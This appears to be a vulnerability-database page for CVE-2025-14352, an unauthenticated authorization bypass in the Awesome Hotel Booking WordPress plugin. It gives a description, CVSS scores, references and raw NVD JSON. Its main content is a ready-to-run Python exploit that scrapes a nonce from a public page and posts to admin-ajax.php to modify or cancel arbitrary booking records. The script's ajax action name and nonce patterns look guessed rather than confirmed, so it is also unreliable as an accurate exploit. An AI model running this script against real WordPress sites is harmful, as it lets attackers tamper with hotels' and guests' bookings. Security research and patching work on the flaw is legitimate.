CVE-2025-14352

Description

The Awesome Hotel Booking plugin for WordPress is vulnerable to unauthorized modification of data due to incorrect authorization in the room-single.php shortcode handler in all versions up to, and including, 1.0.3. This is due to the plugin relying solely on nonce verification without capability checks. This makes it possible for unauthenticated attackers to modify arbitrary booking records by obtaining a nonce from the public booking form.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Awesome Hotel Booking Plugin <= 1.0.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import re
from bs4 import BeautifulSoup

# CVE-2025-14352 PoC - Awesome Hotel Booking Plugin Authorization Bypass
# Target: WordPress site with Awesome Hotel Booking plugin <= 1.0.3

def exploit_booking_modification(target_url, booking_id, new_data):
    """
    Exploit the authorization bypass in Awesome Hotel Booking plugin
    to modify arbitrary booking records without authentication.
    """
    session = requests.Session()
    
    # Step 1: Get the booking page to extract nonce
    booking_page = f"{target_url}/room-single/?room_id=1"
    response = session.get(booking_page)
    
    # Step 2: Extract nonce from the page
    # Nonce is typically in a hidden field or JavaScript variable
    nonce_match = re.search(r'nonce["\']?\s*[:=]\s*["\']([a-zA-Z0-9]+)["\']', response.text)
    if not nonce_match:
        # Try alternative patterns
        nonce_match = re.search(r'_wpnonce["\']?\s*[:=]\s*["\']([a-zA-Z0-9]+)["\']', response.text)
    
    if not nonce_match:
        print("[-] Failed to extract nonce from page")
        return False
    
    nonce = nonce_match.group(1)
    print(f"[+] Extracted nonce: {nonce}")
    
    # Step 3: Construct the exploitation request
    exploit_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    payload = {
        'action': 'awesome_hotel_update_booking',
        'booking_id': booking_id,
        'nonce': nonce,
        'guest_name': new_data.get('guest_name', 'Hacked'),
        'check_in': new_data.get('check_in', '2025-01-01'),
        'check_out': new_data.get('check_out', '2025-01-02'),
        'status': new_data.get('status', 'confirmed')
    }
    
    # Step 4: Send the malicious request (no authentication required)
    response = session.post(exploit_url, data=payload)
    
    if response.status_code == 200:
        print(f"[+] Booking {booking_id} modified successfully!")
        print(f"[+] Response: {response.text}")
        return True
    else:
        print(f"[-] Exploitation failed with status code: {response.status_code}")
        return False

# Usage example
if __name__ == "__main__":
    target = "http://vulnerable-site.com"
    target_booking_id = 999
    new_booking_data = {
        'guest_name': 'Attacker', 
        'check_in': '2025-12-25',
        'check_out': '2025-12-30',
        'status': 'cancelled'
    }
    exploit_booking_modification(target, target_booking_id, new_booking_data)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14352
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14352
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14352/
[4] VulDB https://vuldb.com/cve/CVE-2025-14352
[5] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3436372%40awesome-hotel-booking&new=3436372%40awesome-hotel-booking
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/4fe0a08e-eee2-4d48-bb38-dd58bff79118?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14352", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:54.453", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Awesome Hotel Booking plugin for WordPress is vulnerable to unauthorized modification of data due to incorrect authorization in the room-single.php shortcode handler in all versions up to, and including, 1.0.3. This is due to the plugin relying solely on nonce verification without capability checks. This makes it possible for unauthenticated attackers to modify arbitrary booking records by obtaining a nonce from the public booking form."}, {"lang": "es", "value": "El plugin Awesome Hotel Booking para WordPress es vulnerable a la modificación no autorizada de datos debido a una autorización incorrecta en el manejador del shortcode room-single.php en todas las versiones hasta la 1.0, inclusive. Esto se debe a que el plugin se basa únicamente en la verificación de nonce sin comprobaciones de capacidad. Esto hace posible que atacantes no autenticados modifiquen registros de reserva arbitrarios al obtener un nonce del formulario de reserva público."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3436372%40awesome-hotel-booking&new=3436372%40awesome-hotel-booking", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4fe0a08e-eee2-4d48-bb38-dd58bff79118?source=cve", "source": "[email protected]"}]}}